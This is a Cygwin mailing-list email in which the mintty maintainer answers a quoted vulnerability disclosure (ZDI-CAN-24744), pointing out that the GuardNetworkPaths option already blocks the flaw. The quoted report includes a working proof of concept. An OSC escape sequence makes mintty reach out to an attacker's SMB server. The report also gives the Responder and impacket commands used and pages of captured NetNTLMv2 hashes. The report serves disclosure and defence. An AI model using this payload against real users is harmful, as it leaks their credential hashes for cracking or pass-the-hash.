DKIM-Filter: OpenDKIM Filter v2.11.0 delorie.com 47GIvgSu896883
Authentication-Results: delorie.com;
	dkim=pass (1024-bit key, unprotected) header.d=cygwin.com header.i=@cygwin.com header.a=rsa-sha256 header.s=default header.b=d8UUxsa4
X-Recipient: archive-cygwin AT delorie DOT com
DKIM-Filter: OpenDKIM Filter v2.11.0 sourceware.org 4A4FE385F032
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=cygwin.com;
	s=default; t=1723834660;
	bh=oCNsDIJQmSrEFOof9byNrT7PhRYyJjzNb8AzaQeGpXI=;
	h=Date:Subject:To:References:In-Reply-To:List-Id:List-Unsubscribe:
	 List-Archive:List-Post:List-Help:List-Subscribe:From:Reply-To:
	 From;
	b=d8UUxsa4z3J8t3QdW1NTTo0wAS86YRv7jPtYWWZYnq2FlsVUwJ70Qd/GAKguxzhTy
	 kdGsjSxSxfIk0s9Hvya4X3HPFEDzlb2r3ZtmX1RvR0ev4hczyM3EaGjqvVLvpG3r0W
	 QK82pfsn0Xbopk2mZgrZqpcH/Gwzs6yUgUXDMq7g=
X-Original-To: cygwin AT cygwin DOT com
Delivered-To: cygwin AT cygwin DOT com
DMARC-Filter: OpenDMARC Filter v1.4.2 sourceware.org 804AB3858CDA
ARC-Filter: OpenARC Filter v1.0.0 sourceware.org 804AB3858CDA
ARC-Seal: i=1; a=rsa-sha256; d=sourceware.org; s=key; t=1723834600; cv=none;
 b=Tx29JnW5W/sSwYrRkZUU08Qf4XGf/DDEsSdFmy6j0XuH429Mymla1VsMrKvaMVXEl3orDLihDZgsgSnwVCHl1+/ny82LbE4DY/aoUJscT0heUl4hWsYVR3Oth3VojklW/iP9Zg8PA76Xn4C/ocgj7UEbkOOfG0O7xcxvTrhRNjU=
ARC-Message-Signature: i=1; a=rsa-sha256; d=sourceware.org; s=key;
 t=1723834600; c=relaxed/simple;
 bh=mm5idhPadRBvoL0urx3QfU1Y6kQZ8pyr0KIib/fK5RM=;
 h=DKIM-Signature:Message-ID:Date:MIME-Version:Subject:To:From;
 b=JQ3kPJ/PvV8c0DYhzFQXg5LupXhiCpWQzWGvcaEMaalBCNLTa4ay1eMzsKU/L5EHBc8ZC9bjCjL1XKRNLW9gQG+JIVuOC5qCseTIH+SZ8Y1BWOuEP4vbN7ng9/fy4WPO1Par3bCVi9flM23AZGrSTozq5BMW+XXHAjyH49fbtjA=
ARC-Authentication-Results: i=1; server2.sourceware.org
X-UI-Sender-Class: 55c96926-9e95-11ee-ae09-1f7a4046a0f6
Message-ID: <febc84e3-e14c-4b74-a28f-0bddcd3b79c2@towo.net>
Date: Fri, 16 Aug 2024 20:56:32 +0200
MIME-Version: 1.0
User-Agent: Mozilla Thunderbird
Subject: Re: ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation
 Information Disclosure Vulnerability
To: cygwin AT cygwin DOT com
References: <DM5PR0102MB34771F931BA1B90A126291DE80812 AT DM5PR0102MB3477 DOT prod DOT exchangelabs DOT com>
Autocrypt: addr=towo AT towo DOT net; keydata=
 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 kQ==
In-Reply-To: <DM5PR0102MB34771F931BA1B90A126291DE80812@DM5PR0102MB3477.prod.exchangelabs.com>
X-Provags-ID: V03:K1:s+AXXMS4uvrGfYYVgFIpTFcYXQyfVIqDMDnppkd5C1RM89yZVe7
 QYGGnkXM7KmzzoLzmwbTwkXYQVzTkwX9QFmUhfsxWXs22qjKxtC7nqQe1FprwOWSJI6soev
 WvPc3jpB3ZsYL9AY37HkkkHQ5q9T+NahsOCTgpqBOpq+u49DwGV2COwZY74f98olNz6eUdp
 mnnur1StUmuldW4qSyq5w==
UI-OutboundReport: notjunk:1;M01:P0:w/zZSvuRgiM=;D/uY8LD6Bi3/jAso/v7NmB5by7A
 qx2UybtSkjsuuAly93Z0lCbm7YYyhWp8fL6dtZs8Xg1cN1DOnGrdJrXuXRQqCu0APbAodcprn
 7kJZGC532S06cfvwzTvy/o9qEvSfZZWOEMunce8IZ0bWtPoCSRu+sNQW90EcyD/OcnZQoY3yc
 cc0w4mjXAiKczN/I0VNaTHzoiGcbQwc/7H0TdwNG8LslBhIDlaH4Q9/YHbLwFHGkt/XSCsi6S
 rIhuaNE74m4gQQL3b+SguvQgjcLj175UPvRVK/4hM6Rg8TrR9+AK22RBw6kXbvLXv7/dIugOs
 aADZfAvGtpB8bp90dyeyZloa0UvFyQkYveNpPwC4n5cbGPTvG1sZSh9HE0UQi8vg1JDZzy+rD
 m44NtoM69O0zrSoT07P1rfXihOYVdmx0eHLkFgcb3nT8975LSZD8gl61MtDVF3UPsODbv8X1i
 csenddEWG/97o1iT4aVRfpfy8MNlsLVplaDtplB78d5/KFWkF8yzSG5Cs5vw/VSuNf7M4w8SA
 ZGaWCtyFK2mJQWrfpnKRl7OgGeZfwSBs2bcU0o6v9iCCe/IkEoFgXSS7XzCEU+qpsf66qTkSu
 oDkJHzhlmk8Ji7Toqj/HNN0WqA6walWz+efTMlWYOnkyG2OI7vIhzyAiBhT2013D0XrwThl6W
 p+kDzgaBuT7rwug+G5WVk8Nmkml8aHD0RGYtHtD2wd6jhoiejgrR0bgKD0CH79KzebIsi1vCb
 VeCoELM4kq8LhkqWoDBmc8Df3djVYnfpg==
X-Spam-Status: No, score=0.5 required=5.0 tests=BAYES_40, DKIM_SIGNED,
 DKIM_VALID, DKIM_VALID_AU, DKIM_VALID_EF, KAM_ASCII_DIVIDERS, KAM_LOTSOFHASH,
 RCVD_IN_DNSWL_NONE, SPF_HELO_NONE, SPF_PASS, TXREP, T_SCC_BODY_TEXT_LINE,
 WEIRD_PORT autolearn=no autolearn_force=no version=3.4.6
X-Spam-Checker-Version: SpamAssassin 3.4.6 (2021-04-09) on
 server2.sourceware.org
X-BeenThere: cygwin AT cygwin DOT com
X-Mailman-Version: 2.1.30
Precedence: list
List-Id: General Cygwin discussions and problem reports <cygwin.cygwin.com>
List-Unsubscribe: <https://cygwin.com/mailman/options/cygwin>,
 <mailto:cygwin-request AT cygwin DOT com?subject=unsubscribe>
List-Archive: <https://cygwin.com/pipermail/cygwin/>
List-Post: <mailto:cygwin AT cygwin DOT com>
List-Help: <mailto:cygwin-request AT cygwin DOT com?subject=help>
List-Subscribe: <https://cygwin.com/mailman/listinfo/cygwin>,
 <mailto:cygwin-request AT cygwin DOT com?subject=subscribe>
From: Thomas Wolff via Cygwin <cygwin AT cygwin DOT com>
Reply-To: Thomas Wolff <towo AT towo DOT net>
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="us-ascii"; Format="flowed"
Errors-To: cygwin-bounces~archive-cygwin=delorie DOT com AT cygwin DOT com
Sender: "Cygwin" <cygwin-bounces~archive-cygwin=delorie DOT com AT cygwin DOT com>


Am 16.08.2024 um 16:25 schrieb zdi-disclosures--- via Cygwin:
> The attachment could not be scanned for viruses because it is a password protected file.
> ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation Information Disclosure Vulnerability
???
> -- CVSS -----------------------------------------
>
> 5.3: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
>
> -- ABSTRACT -------------------------------------
>
> Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products:
> Mintty - Mintty
>
> -- VULNERABILITY DETAILS ------------------------
> * Version tested:3.7.1 (Git-2.45.2-64-bit.exe)
> * Installer file:Git-2.45.2-64-bit.exe
> * Platform tested:win11 23h2 [Version 10.0.22631.3593]
>
> ---
>
> ### Analysis
>
> ```
> Several escape sequences can cause the mintty process to access a file in a specific path,
> It is triggered by simply printing them out on bash, eg. \x1b]7773;//0.0.0.0/test\007
> An attacker can specify an arbitrary network path, negotiate an ntlm hash out of the victim's machine to an attacker controlled remote host.
> NetNTLMv2 hashes can be used to Pass the Hash, or password cracking using tools like hashcat or johntheripper.
>
> It's caused by an api provided by msys2.
> The api is used to convert between posix and windows paths, but it also checks for symbolic links, which is enough to trigger the vulnerability.
> The same code is forked from cygwin, so it could also be theoretically vulnerable,
>
> In the exploit, It used the escape code for setting the terminal icon OSC 7773,
> but it can be done with other escape codes as well.
> For example, there's an escape code for indicating the cwd of the shell,
> which can lead to mintty `stat`ing the directory, which is sufficient for exploitation.
> ```
>
> The following cover most of the escape codes that could be exploited:
> ```
> - OSC I / OSC 7773
> - OSC 440
> - OSC 11
> - OSC 7
> - OSC 8
> ```
Since mintty 3.7.0, option GuardNetworkPaths and its default setting
prevents this exploit.
Thomas

> The call stack is roughly the following:
> ```
> mintty:
> src/winmain.c:308 - guardpath
> src/charset.c:1104 - path_posix_to_win_w
> msys2:
> cygwin_create_path (depends on mintty's compilation flags, but it calls cygwin_conv_path regardless)
> winsup/cygwin/path.cc:3909 - cygwin_conv_path
> winsup/cygwin/path.cc:660 - path_conv::check
> ```
>
> `path_conv::check` calls several windows apis that cause a connection to a remote path to be initiated.
>
>
>
> Here is the reproduce steps.
>
> Setup an attacker vm (Linux based) and a victim vm (windows).
>
> Modify the payload for the appropriate ip address (attacker vm's ip):
>
> ```
> \x1b]7773;//0.0.0.0/test\007
> ```
>
> On the Attacker's machine run either [impacket](https://github.com/fortra/impacket)'s smbserver.py or [Responder](https://github.com/lgandx/Responder) with smb server enabled:
>
> ```
> sudo smbserver.py -ts -smb2support test .
> ```
>
> ```
> sudo ./Responder.py -I enp1s0 -v
> ```
>
> Replace `enp1s0` with the proper interface.
>
> Make sure that other smb services aren't running:
>
> ```
> systemctl status smbd.service
> systemctl status nmbd.service
> ```
>
> Print the adjusted payload from the beginning in mintty (git-bash.exe).
>
> The victim's hash should be printed by impacket or Responder.
>
>
>
>
> Here is the output from responder
> ```
> [+] Listening for events...
>
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:38cf5ca194861c7c:05F329D7F39AEFE3C744671936ABC00E:010100000000000000D29167A9CCDA0195D8F1578A8B58C30000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:331cb34ad722601a:F71C80EE1309C62CA4FF8E254A7AC1AE:010100000000000000D29167A9CCDA0142C3153183B226600000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:b5bc3a6e83c4d7d7:40218E62EF8DCA0023C166B568781059:010100000000000000D29167A9CCDA01797E79F388A237B30000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:ae5464fd841bcab6:F76567E68408F2B04E41B869711E76F8:010100000000000000D29167A9CCDA01E0A7FFF1FF381FA60000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:3bd0a49004b53416:F21B104294C18C82464FEDDC572E6231:010100000000000000D29167A9CCDA01BAAEF54AF54B72560000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:c089b70c3accfaf7:E6B708A8DA76027A16E76F79F5F24333:010100000000000000D29167A9CCDA01433CAD8EC5BCC31A0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:daa3eae276eaef28:AE4059F544451A21F5779DFB3192D9DA:010100000000000000D29167A9CCDA0110F73C1AE7035F2B0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:56c7b5b6c66d156a:96665824D373D99E5F043EFE7724BCF1:010100000000000000D29167A9CCDA012F33E5442DE0DDD40000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:44db8723d9666e80:2DAC87BC05CCECEB4BC8BFD8A9ED2317:010100000000000000D29167A9CCDA014DFB0815892812720000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:4f6f6e6df73e1d2c:884C66B57E2711811EE502E0796E8138:010100000000000000D29167A9CCDA0148213EEACAF1B7200000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:f1f9c2482522cd95:A0790CFB87DD01F4E10F57F94D487109:010100000000000000D29167A9CCDA01F1D6F8F5882213640000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:0a070bdf7688033f:C4B1F0D2CF4B23B7475AAB780FBCB685:010100000000000000D29167A9CCDA01C53624960CE78E120000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:e8f874be1a16042c:255BDD064E5A8C080FC3E0438A1D3502:010100000000000000D29167A9CCDA01F2A0B31CD1B4EB190000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:b7e3a6f69f1ba3dc:4FBC3B5E8781619637C21E21575EB522:010100000000000000D29167A9CCDA0161610316FA9D3D4E0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:9bceb9d050c9b28f:1618EE69D7DEA633EBD38C27ACC89190:010100000000000000D29167A9CCDA01D3E44752D8FA554B0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> ```
>
> procmon log
> ```
> Date:   7/8/2024 2:07:57.3678237 PM
> Thread: 4844
> Class:  File System
> Operation:      CreateFile
> Result: ACCESS DENIED
> Path:   \\[attacker IP]\test007\
> Duration:       0.0112557
> Desired Access: Read EA, Read Attributes, Read Control
> Disposition:    Open
> Options:        Open Reparse Point
> Attributes:     n/a
> ShareMode:      Read, Write, Delete
> AllocationSize: n/a
>
> Description:
> Company:
> Name:   bash.exe
> Version:
> Path:   C:\Program Files\Git\usr\bin\bash.exe
> Command Line:   "C:\Program Files\Git\usr\bin\bash.exe" --login -i
> PID:    6172
> Parent PID:     1844
> Session ID:     1
> User:   DESKTOP-QAVUII5\wmliang
> Auth ID:        00000000:0015a222
> Architecture:   64-bit
> Virtualized:    False
> Integrity:      Medium
> Started:        7/8/2024 2:07:57 PM
> Ended:  7/8/2024 2:07:57 PM
> Modules:
> bash.exe        0x100400000     0x245000        C:\Program Files\Git\usr\bin\bash.exe                   1/14/2024 5:25:36 AM
> msys-2.0.dll    0x210040000     0x1227000       C:\Program Files\Git\usr\bin\msys-2.0.dll       Red Hat 3.4.10-87d5722901e1172a57aa4d4e3db84fbafe70d19b 2/14/2024 4:11:38 PM
>
> 0       FLTMGR.SYS      FltGetStreamContext + 0x20cb    0xfffff8045abe961b      C:\Windows\System32\drivers\FLTMGR.SYS
> 1       FLTMGR.SYS      FltGetStreamContext + 0x1b51    0xfffff8045abe90a1      C:\Windows\System32\drivers\FLTMGR.SYS
> 2       FLTMGR.SYS      FltRequestFileInfoOnCreateCompletion + 0x4ef    0xfffff8045ac21f6f      C:\Windows\System32\drivers\FLTMGR.SYS
> 3       ntoskrnl.exe    IofCallDriver + 0x55    0xfffff80455c29b45      C:\Windows\system32\ntoskrnl.exe
> 4       ntoskrnl.exe    ProbeForWrite + 0x40fe  0xfffff8045619c8be      C:\Windows\system32\ntoskrnl.exe
> 5       ntoskrnl.exe    ObOpenObjectByNameEx + 0x1844   0xfffff804560cc9e4      C:\Windows\system32\ntoskrnl.exe
> 6       ntoskrnl.exe    ObOpenObjectByNameEx + 0x1f2    0xfffff804560cb392      C:\Windows\system32\ntoskrnl.exe
> 7       ntoskrnl.exe    NtCreateFile + 0x4c1    0xfffff80456194311      C:\Windows\system32\ntoskrnl.exe
> 8       ntoskrnl.exe    NtCreateFile + 0x79     0xfffff80456193ec9      C:\Windows\system32\ntoskrnl.exe
> 9       ntoskrnl.exe    setjmpex + 0x9045       0xfffff80455e2d505      C:\Windows\system32\ntoskrnl.exe
> 10      ntdll.dll       NtCreateFile + 0x14     0x7ffb3fdf03f4  C:\Windows\System32\ntdll.dll
> 11      msys-2.0.dll    setpassent + 0x2ff3     0x2100929c3     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 12      msys-2.0.dll    cygwin_split_path + 0x2c68      0x210096988     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 13      msys-2.0.dll    sigfillset + 0x6935     0x2100c40a5     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 14      msys-2.0.dll    sigfillset + 0x7f98     0x2100c5708     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 15      msys-2.0.dll    sigfillset + 0x9f81     0x2100c76f1     C:\Program Files\Git\usr\bin\msys-2.0.dll
